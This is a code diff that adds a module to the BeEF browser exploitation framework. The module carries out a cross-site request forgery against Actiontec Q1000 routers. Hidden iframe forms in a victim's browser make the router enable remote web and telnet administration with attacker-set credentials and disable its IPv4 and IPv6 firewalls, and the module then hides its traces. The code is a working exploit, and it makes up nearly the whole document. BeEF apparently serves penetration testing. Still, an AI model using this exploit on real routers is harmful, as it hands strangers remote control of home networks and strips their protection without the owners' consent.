Merge pull request #900 from james-otten/master

Added Actiontec Q1000 router CSRF module

modules/exploits/router/actiontec_q1000_csrf/command.js

@@ -0,0 +1,52 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var gateway = '<%= @base %>'; 
+	var user    = '<%= @user %>';
+	var passwd  = '<%= @password %>';
+	var port    = '<%= @port %>';
+	var timeout = 15;
+
+	var actiontec_q1000_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotegui.cgi", "POST", [
+		{'type':'hidden', 'name':'serCtlHttp',          'value':'1'},
+		{'type':'hidden', 'name':'adminUserName',       'value':user},
+		{'type':'hidden', 'name':'adminPassword',       'value':passwd},
+		{'type':'hidden', 'name':'remGuiTimeout',       'value':'0'},
+		{'type':'hidden', 'name':'remGuiPort',          'value':port}
+	]);
+
+	var actiontec_q1000_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotetelnet.cgi", "POST", [
+		{'type':'hidden', 'name':'serCtlTelnet',        'value':'1'},
+		{'type':'hidden', 'name':'remTelUser',          'value':user},
+		{'type':'hidden', 'name':'remTelPass',          'value':passwd},
+		{'type':'hidden', 'name':'remTelTimeout',       'value':'0'},
+		{'type':'hidden', 'name':'remTelPassChanged',   'value':'1'}
+	]);
+
+	var actiontec_q1000_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_firewallsettings.cgi", "POST", [
+		{'type':'hidden', 'name':'fwLevel',             'value':'Basic'},
+		{'type':'hidden', 'name':'fwStealthMode',       'value':'0'}
+	]);
+
+	var actiontec_q1000_iframe4_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "ipv6_firewallsettings.cgi", "POST", [
+		{'type':'hidden', 'name':'ipv6_fwlevel',        'value':'basic'},
+		{'type':'hidden', 'name':'ipv6_fwenable',       'value':'0'}
+	]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	cleanup = function() {
+		document.body.removeChild(actiontec_q1000_iframe1_<%= @command_id %>);
+		document.body.removeChild(actiontec_q1000_iframe2_<%= @command_id %>);
+		document.body.removeChild(actiontec_q1000_iframe3_<%= @command_id %>);
+		document.body.removeChild(actiontec_q1000_iframe4_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+

modules/exploits/router/actiontec_q1000_csrf/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        actiontec_q1000_csrf:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "Actiontec Q1000 CSRF"
+            description: "Attempts to enable remote web and telnet administration, and disables the firewall on an Actiontec Q1000 router."
+            authors: ["james-otten"]
+            target:
+                working: ["ALL"]

modules/exploits/router/actiontec_q1000_csrf/module.rb

@@ -0,0 +1,21 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Actiontec_q1000_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/'},
+			{'name' => 'user', 'ui_label' => 'Desired username', 'value' => 'admin'},
+			{'name' => 'password', 'ui_label' => 'Desired password', 'value' => 'BeEF'},
+			{'name' => 'port', 'ui_label' => 'Desired web ui port', 'value' => '443'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end